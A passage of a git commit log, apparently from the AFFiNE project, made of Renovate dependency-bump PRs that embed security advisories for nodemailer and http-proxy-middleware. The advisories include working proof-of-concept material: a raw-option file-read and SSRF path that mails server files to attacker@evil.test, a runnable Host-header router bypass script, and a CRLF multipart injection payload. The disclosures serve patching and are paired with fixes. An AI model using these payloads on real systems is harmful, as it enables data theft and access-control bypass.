([#​655](https://redirect.github.com/apple/swift-collections/issues/655)) #### What's Changed - Add missing availability to Borrow by [@​guoye-zhang](https://redirect.github.com/guoye-zhang) in [#​655](https://redirect.github.com/apple/swift-collections/pull/655) - \[InternalCollectionsUtilities] Fix \_trim returning the wrong buffer region by [@​adityasingh2400](https://redirect.github.com/adityasingh2400) in [#​659](https://redirect.github.com/apple/swift-collections/pull/659) - \[SortedCollections] Fix \_BTree default node capacity capping at 16 by [@​adityasingh2400](https://redirect.github.com/adityasingh2400) in [#​661](https://redirect.github.com/apple/swift-collections/pull/661) - Small benchmarking improvements by [@​lorentey](https://redirect.github.com/lorentey) in [#​664](https://redirect.github.com/apple/swift-collections/pull/664) - \[OrderedCollections] Add move operations by [@​dnadoba](https://redirect.github.com/dnadoba) in [#​660](https://redirect.github.com/apple/swift-collections/pull/660) - 1.6.0 prerelease cleanups by [@​lorentey](https://redirect.github.com/lorentey) in [#​665](https://redirect.github.com/apple/swift-collections/pull/665) #### New Contributors - [@​guoye-zhang](https://redirect.github.com/guoye-zhang) made their first contribution in [#​655](https://redirect.github.com/apple/swift-collections/pull/655) - [@​adityasingh2400](https://redirect.github.com/adityasingh2400) made their first contribution in [#​659](https://redirect.github.com/apple/swift-collections/pull/659) **Full Changelog**: <https://github.com/apple/swift-collections/compare/1.5.1...1.6.0> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7ea8800c99 |
chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`^8.0.11` → `^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) |  |  | --- ### Nodemailer: Message-level raw option bypasses disableFileAccess/disableUrlAccess, enabling arbitrary file read and full-response SSRF in the delivered message [GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) <details> <summary>More information</summary> #### Details ##### Message-level `raw` option bypasses `disableFileAccess` / `disableUrlAccess`, enabling arbitrary file read and full-response SSRF in the sent message - **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD `4e58450eb490e5097a74b2b2cce35a8d9e21856e`) - **Verdict:** CONFIRMED (local PoC, no network) ##### Summary Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an application that passes **untrusted** message data to the library can forbid that data from reading local files or fetching URLs. Every attachment, alternative, `html`/`text`/`watchHtml`/`amp` and `icalEvent` content node honors these flags. **The message-level `raw` option does not.** `MailComposer.compile()` builds the root MIME node for a `raw` message **without** threading the two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href: 'http://169.254.169.254/…' }` message is read / fetched anyway, and the file or HTTP-response bytes become the **actual message that is sent** by every transport (SMTP, SES, sendmail, stream, JSON). An actor whose input the application intended to sandbox therefore obtains arbitrary local-file disclosure and a full-response SSRF primitive, delivered to a recipient the same actor can choose. This is the same vulnerability class as the already-published jsonTransport advisory **GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node, not `normalize()`), and strictly higher impact: the jsonTransport bug only affected the locally-returned JSON, whereas this affects the delivered RFC822 message for all transports. ##### Affected component - `lib/mail-composer/index.js:34-35` — root cause: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline }).setRaw(this.mail.raw); } ``` The `MimeNode` is constructed with only `{ newline }`. Compare the sibling node builders `_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode` (`lib/mail-composer/index.js:389-527`), which all pass `disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess`. - `lib/mime-node/index.js:51-52` — the constructor derives `this.disableFileAccess`/ `this.disableUrlAccess` solely from its own `options`; children do **not** inherit a parent's flags (`createChild`/`appendChild`, lines 175-194, pass options through verbatim). - `lib/mime-node/index.js:812` — `setRaw()` content is resolved through `this._getStream(this._raw)`. - `lib/mime-node/index.js:984-1010` — `_getStream` reads the file (`fs.createReadStream`, 995) or fetches the URL (`nmfetch`, 1009) **only guarded by `this.disableFileAccess`/`this.disableUrlAccess`**, which on the `raw` root node are `false`. - Reached from the normal send flow at `lib/mailer/index.js:188` (`mail.message = new MailComposer(mail.data).compile()`), so every transport is affected. ##### Reachability gate (hop-by-hop) 1. **Source.** Application calls `transporter.sendMail({ raw: <userControlled> , to: <userControlled> })` with `disableFileAccess: true` and/or `disableUrlAccess: true` configured on the transporter (forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per message. This is the exact scenario the flags exist for — the same precondition under which GHSA-wqvq-jvpq-h66f was accepted. 2. **Guard — the access flags.** For attachments the flag is enforced: a node created by `_createContentNode` carries `disableFileAccess`, so `_getStream` throws `EFILEACCESS`. **Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on its node, so `this.disableFileAccess === false` and the guard at `mime-node:985` / `:999` is skipped. There is no other validation between `mail.raw` and the read; `raw` content shapes (`{path}`, `{href}`, stream, string, buffer) are accepted as-is by `setRaw`/`_getStream`. 3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or `nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as the message body by `createReadStream()`, which every transport pipes to its destination (`smtp-transport:233`, `smtp-pool/pool-resource:208`, `ses-transport:96`, `sendmail-transport:184`, `stream-transport:67`). No guard blocks the chain; the only guard (the access flags) is structurally absent on this node. ##### Root cause Inconsistent enforcement: the access policy is applied per-`MimeNode` via constructor options and must be re-passed at every node creation. The `raw`-message shortcut in `compile()` omits it, while all five other node builders include it. The flags are therefore enforced for every content type *except* the one that lets the caller supply a complete message body by path/URL. ##### Exploit path Application that sandboxes untrusted mail input (`disableFileAccess`/`disableUrlAccess` set): 1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or any server file: `/app/.env`, key material, etc.) and `to: attacker@evil.test`. 2. `compile()` builds the raw root node without the flags; the transport reads the file and sends its contents as the message → **arbitrary server-file exfiltration to an attacker-chosen mailbox.** 3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a cloud metadata URL → Nodemailer fetches it server-side and delivers the full response body in the email → **full-response SSRF** (no blind-channel limitation). ##### Impact - **Confidentiality (High):** arbitrary local file read disclosed in the outgoing message; full-response SSRF to internal/metadata endpoints, also disclosed in the message. - **Integrity (Low):** attacker-fetched/file content is injected into the delivered mail. - The two protective flags an application relies on to contain untrusted input are silently ineffective for `raw`. ##### Preconditions The application (a) passes `disableFileAccess` and/or `disableUrlAccess` (the documented sandboxing flags) and (b) lets untrusted input influence the `raw` field (and, for maximal disclosure, `to`). No other configuration is required; all bundled transports are affected. This mirrors the accepted precondition of GHSA-wqvq-jvpq-h66f. ##### Severity - **AV** — message data routinely originates over the network in the apps these flags protect. - **AC** — a single crafted `raw` object; deterministic. - **PR** — the actor is a user whose input the app already treats as untrusted (the reason the flags are set); not fully anonymous in the typical deployment. - **UI** — no victim interaction. - **S** — impact within Nodemailer's process scope. - **C** — arbitrary file read **and** full-response SSRF, both delivered to an attacker-chosen recipient. (The sibling jsonTransport advisory used C:L because its leak stayed in locally-returned JSON; here the bytes leave the system in the sent message, so C:H is warranted.) - **I** — attacker injects fetched/file bytes into the outgoing message. - **A**. Note: if a deployment fixes the recipient (`to` not attacker-controlled) the disclosure channel narrows and the rating degrades toward the sibling's Medium; the High rating reflects the reasonable worst case where `raw` and `to` are both untrusted. ##### Adversarial re-read (attempts to refute) 1. **"`raw` content is by-design trusted, so the flags shouldn't apply."** Rejected: every other content path (attachments, alternatives, html/text, icalEvent) honors the flags, and the maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this "untrusted input + flag set" model. The asymmetry — attachment `{path}` is blocked but `raw:{path}` is not — is the bug, and the PoC's CONTROL case proves the flag is otherwise effective on the same file. 2. **"The raw node inherits the flags via rootNode."** Rejected by code and by PoC: `compile():35` constructs the node with `{ newline }` only; `MimeNode` constructor sets `this.disableFileAccess = !!options.disableFileAccess` → `false`; `rootNode` is itself; no inheritance exists. 3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL message (`attachments:[{path}]`, same file, same transporter) returns `EFILEACCESS`; only the `raw:{path}` message leaks. The sentinel nonce exists solely in the temp file; the URL nonce is generated server-side and is only obtainable by an actual fetch. Both observables are uniquely bound to the bypass. 4. **"Maybe only jsonTransport (already reported) is affected."** Rejected: the PoC uses `streamTransport` and the root cause is in `MailComposer.compile()` (`mailer:188`), shared by all transports; jsonTransport is a different (already-fixed) path. I could not find any guard that blocks the chain; the finding survives. ##### Proof of concept (safe, benign) `findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no network egress (loopback only), no destructive action. Output: ``` [CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here [ATTACK] raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message [ATTACK] raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF) VERDICT: CONFIRMED ``` Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0 = confirmed). ##### Remediation Thread the access policy onto the `raw` root node, exactly as the other builders do: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline, disableFileAccess: this.mail.disableFileAccess, disableUrlAccess: this.mail.disableUrlAccess }).setRaw(this.mail.raw); } ``` (Defense in depth: `setRaw`/`_getStream` could also refuse `{path}`/`{href}` raw content when either flag is set, regardless of how the node was constructed.) Add a regression test asserting that `raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS` when the flags are set, mirroring the attachment tests. #### Severity - CVSS Score: 7.1 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N` #### References - [https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f) - [https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1) ##### Bug Fixes - enforce disableFileAccess/disableUrlAccess for raw message option ([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2)) ### [`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0) ##### ⚠ BREAKING CHANGES - HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment `tls` option). ##### Bug Fixes - replace deprecated url.parse with a WHATWG URL wrapper ([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed)) - validate TLS certificates by default when fetching remote content ([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
16196c6ca1 |
chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware) | [`3.0.5` → `3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7) |  |  | --- ### http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass [CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) / [GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) <details> <summary>More information</summary> #### Details ##### Summary `http-proxy-middleware` documents `router` proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted `Host` header that is only a superstring match for a configured host+path key can still route a request to an unintended backend. ##### Details Tested code state: - validated on tag `v4.0.0-beta.5` - corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358` Relevant code locations: - `src/router.ts` - `src/http-proxy-middleware.ts` Affected public API: - `createProxyMiddleware({ router: { 'host/path': 'http://target' } })` Code explanation: When a proxy-table router key contains `/`, `getTargetFromProxyTable()` concatenates attacker-controlled `req.headers.host` and `req.url` into a single `hostAndPath` string, then accepts the route if: ```ts hostAndPath.indexOf(key) > -1 ``` That is a substring test, not an exact host match plus intended path match. In the validated PoC, the configured router key is: ```txt localhost:3000/api ``` but the attacker-controlled host is: ```txt evillocalhost:3000 ``` and the request path is: ```txt /api ``` The concatenated attacker-controlled string: ```txt evillocalhost:3000/api ``` still contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host. Exploit path: 1. the application enables the documented proxy-table `router` feature with at least one host+path rule 2. an external attacker sends an ordinary HTTP request with a crafted `Host` header 3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection before proxying 4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string through substring matching 5. the request is proxied to the wrong backend ##### PoC Create these files in the same working directory and run: ```bash bash ./run.sh ``` ##### File: `run.sh` ```bash #!/usr/bin/env bash set -euo pipefail SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" REPO_URL="https://github.com/chimurai/http-proxy-middleware.git" REPO_REF="v4.0.0-beta.5" WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")" TARGET_REPO_DIR="${WORKDIR}/repo" REPRO_DIR="${WORKDIR}/reproduction" IMAGE_TAG="http-proxy-middleware-router-bypass-poc" cleanup() { rm -rf "${WORKDIR}" } trap cleanup EXIT echo "[a3] cloning target repository" git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}" git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}" mkdir -p "${REPRO_DIR}" cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile" cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs" echo "[a3] building reproduction image" docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}" echo "[a3] running verification" docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs ``` ##### File: `Dockerfile` ```Dockerfile FROM node:22-bullseye WORKDIR /work COPY repo/package.json repo/yarn.lock /work/repo/ RUN corepack enable \ && cd /work/repo \ && yarn install --frozen-lockfile COPY repo /work/repo RUN cd /work/repo && yarn build COPY reproduction /work/reproduction ``` ##### File: `verify.mjs` ```js import http from 'node:http'; import fs from 'node:fs'; import assert from 'node:assert/strict'; import { createProxyMiddleware } from '/work/repo/dist/index.js'; const ROUTER_KEY = 'localhost:3000/api'; const CRAFTED_HOST = 'evillocalhost:3000'; function listen(server, port) { return new Promise((resolve) => { server.listen(port, '127.0.0.1', () => resolve()); }); } function close(server) { return new Promise((resolve, reject) => { server.close((err) => { if (err) { reject(err); return; } resolve(); }); }); } function request(path, host) { return new Promise((resolve, reject) => { const req = http.request( { host: '127.0.0.1', port: 3000, path, method: 'GET', headers: { Host: host, }, }, (res) => { let data = ''; res.setEncoding('utf8'); res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { resolve({ statusCode: res.statusCode, body: data }); }); }, ); req.on('error', reject); req.end(); }); } const defaultBackend = http.createServer((req, res) => { res.end('DEFAULT'); }); const secretBackend = http.createServer((req, res) => { res.end('SECRET'); }); const proxyMiddleware = createProxyMiddleware({ target: 'http://127.0.0.1:3101', router: { [ROUTER_KEY]: 'http://127.0.0.1:3102', }, }); const proxyServer = http.createServer((req, res) => { proxyMiddleware(req, res, () => { res.statusCode = 404; res.end('NO_PROXY'); }); }); try { assert.ok(fs.existsSync('/work/repo/dist/index.js')); assert.ok(fs.existsSync('/work/reproduction/verify.mjs')); await listen(defaultBackend, 3101); await listen(secretBackend, 3102); await listen(proxyServer, 3000); console.log('STEP start-services ok'); const baseline = await request('/api', 'safe.example:3000'); assert.equal(baseline.statusCode, 200); assert.equal(baseline.body, 'DEFAULT'); console.log(`STEP baseline-route body=${baseline.body}`); const crafted = await request('/api', CRAFTED_HOST); assert.equal(crafted.statusCode, 200); assert.equal(crafted.body, 'SECRET'); assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]); console.log(`STEP crafted-route body=${crafted.body}`); console.log('RESULT reproduced host_header_injection router substring match bypass'); } finally { await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]); } ``` This PoC starts: - one default backend returning `DEFAULT` - one alternate backend returning `SECRET` - one proxy using: ```js createProxyMiddleware({ target: 'http://127.0.0.1:3101', router: { [ROUTER_KEY]: 'http://127.0.0.1:3102', }, }); ``` It then sends: 1. a baseline request to `/api` with `Host: safe.example:3000` 2. a crafted request to `/api` with `Host: evillocalhost:3000` Observed result from the validated PoC: - baseline request: `STEP baseline-route body=DEFAULT` - crafted request: `STEP crafted-route body=SECRET` - success marker: `RESULT reproduced host_header_injection router substring match bypass` The PoC is considered successful only if: 1. the baseline request stays on the default backend 2. the crafted request reaches the alternate backend 3. the crafted host is not equal to the configured router host ##### Impact This is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted `Host` header. #### Severity - CVSS Score: 6.9 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N` #### References - [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj) - [https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in `fixRequestBody` [CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) / [GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) <details> <summary>More information</summary> #### Details ##### Summary `fixRequestBody()` is the library's documented helper for re-emitting a request body that was already consumed by a body parser. When the **outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the body with `handlerFormDataBodyData()`, which interpolates each `req.body` key and value directly into the multipart wire format **without neutralizing CR/LF**: ```js // dist/handlers/fix-request-body.js function handlerFormDataBodyData(contentType, data) { const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1'); let str = ''; for (const [key, value] of Object.entries(data)) { str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`; } } ``` A `\r\n` inside a value (or key) lets an attacker close the current part and inject an **entirely new form part**. Because the proxy's own body parser saw a single opaque value, any gateway-side policy or validation performed on `req.body` is evaluated against a different set of fields than the upstream backend ultimately parses a request/parameter desynchronization across the trust boundary. By contrast, the sibling output branches are safe: `application/json` uses `JSON.stringify` (escapes control chars) and `application/x-www-form-urlencoded` uses `querystring.stringify` (percent-encodes). Only the multipart branch lacks escaping. ##### Preconditions All three must hold; this narrows real-world exposure and is the basis for `AC:H`: 1. The proxy app populates `req.body` with a **non-multipart** parser (`express.urlencoded`, `express.json`, or text) so an injected boundary in a value is **not** split on input. 2. The proxied (outgoing) request is sent as **`multipart/form-data`** (e.g. an adaptation layer, or any flow that sets the upstream content-type to multipart), so the vulnerable branch runs. 3. The app calls `fixRequestBody` (the documented pattern for "I body-parsed, now re-stream"), and an attacker controls at least one body field value or key. > Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is generally **not** exploitable for a *new-field* injection, because the proxy's multipart parser already splits the injected boundary, so `req.body` and the backend agree. The desync specifically requires a non-multipart input parser. ##### Impact When the preconditions hold, an attacker injects/overrides multipart fields seen only by the backend: - **Validation / access-control bypass** bypass gateway-side field checks (demonstrated below: a gateway that forbids `role=admin` is bypassed; backend grants admin). - **Parameter tampering** add or overwrite fields the backend trusts (IDs, flags, prices). - **File-part injection** inject a `filename="..."` part into the upstream multipart stream. ##### Proof of Concept ```js // npm i http-proxy-middleware@4.0.0 (Node ESM: save as minimal.mjs) import { fixRequestBody } from 'http-proxy-middleware'; // `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it. // The attacker sent user=alice%0D%0A--BB%0D%0A... so this ONE field's value holds CRLF: const req = { readableLength: 0, body: { user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--' }}; // Minimal stand-in for the outgoing proxy request; capture what gets written. const out = []; const proxyReq = { h: { 'content-type': 'multipart/form-data; boundary=BB' }, getHeader(n){ return this.h[n.toLowerCase()]; }, setHeader(n,v){ this.h[n.toLowerCase()] = v; }, write(d){ out.push(Buffer.from(d)); }, }; fixRequestBody(proxyReq, req); // library rebuilds the multipart body console.log(Buffer.concat(out).toString()); ``` Output: one input field becomes **two** parts; `role=admin` was injected via the unescaped CRLF: ``` --BB Content-Disposition: form-data; name="user" alice --BB Content-Disposition: form-data; name="role" <-- injected part; never present in req.body's keys admin --BB-- ``` `req.body` had a single key (`user`), so any gateway policy checking `req.body.role` passes, yet the backend's multipart parser receives `role=admin`. On the wire the attacker simply sends, as `application/x-www-form-urlencoded`: `user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--` ##### Remediation Neutralize CR/LF (and `"`) in keys/values before interpolation, or build the body with a real multipart encoder (e.g. `FormData` / `form-data`) instead of string concatenation. Minimal fix: ```js function handlerFormDataBodyData(contentType, data) { const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1'); const bad = /[\r\n]/; let str = ''; for (const [key, value] of Object.entries(data)) { const v = String(value); if (bad.test(key) || bad.test(v)) { throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value'); } str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`; } } ``` (Reject is preferable to silent stripping, to avoid masking malicious input.) #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N` #### References - [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm) - [https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>chimurai/http-proxy-middleware (http-proxy-middleware)</summary> ### [`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7) [Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7) #### What's Changed - fix(fixRequestBody): harden form-data stringification by [@​chimurai](https://redirect.github.com/chimurai) in [#​1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259) - chore(package.json): v3.0.7 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261) **Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7> ### [`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6) [Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6) #### What's Changed - fix(types): fix Logger type by [@​chimurai](https://redirect.github.com/chimurai) in [#​1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104) - fix(fixRequestBody): support text/plain by [@​knudtty](https://redirect.github.com/knudtty) in [#​1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103) - chore(examples): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105) - build(prettier): improve prettier setup by [@​chimurai](https://redirect.github.com/chimurai) in [#​1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108) - chore(deps): fix punycode node deprecation warning by [@​chimurai](https://redirect.github.com/chimurai) in [#​1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109) - chore(examples): bump deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110) - build(codespaces): add devcontainer.json by [@​chimurai](https://redirect.github.com/chimurai) in [#​1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112) - chore(package): bump dev dependencies by [@​chimurai](https://redirect.github.com/chimurai) in [#​1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116) - ci(github-action): ci.yml add node v24 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117) - chore(package): bump dev dependencies by [@​chimurai](https://redirect.github.com/chimurai) in [#​1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118) - chore(package): upgrade to jest v30 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122) - chore(examples): upgrade deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124) - chore(package): update dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125) - test(websocket): fix ws import by [@​chimurai](https://redirect.github.com/chimurai) in [#​1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126) - chore(refactor): use `node:` protocol imports by [@​chimurai](https://redirect.github.com/chimurai) in [#​1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127) - ci(node24): pin node24 due to TLS issue with mockttp by [@​chimurai](https://redirect.github.com/chimurai) in [#​1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137) - docs(recipes/pathRewrite.md): fix comment by [@​DEBargha2004](https://redirect.github.com/DEBargha2004) in [#​1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135) - chore(package): bump dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138) - chore(deps): update actions/checkout action to v5 by [@​chimurai](https://redirect.github.com/chimurai) in [#​1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140) - fix(error-response-plugin): sanitize input by [@​chimurai](https://redirect.github.com/chimurai) in [#​1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141) - chore(package.json): update dev deps by [@​chimurai](https://redirect.github.com/chimurai) in [#​1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143) - chore: add context7.json by 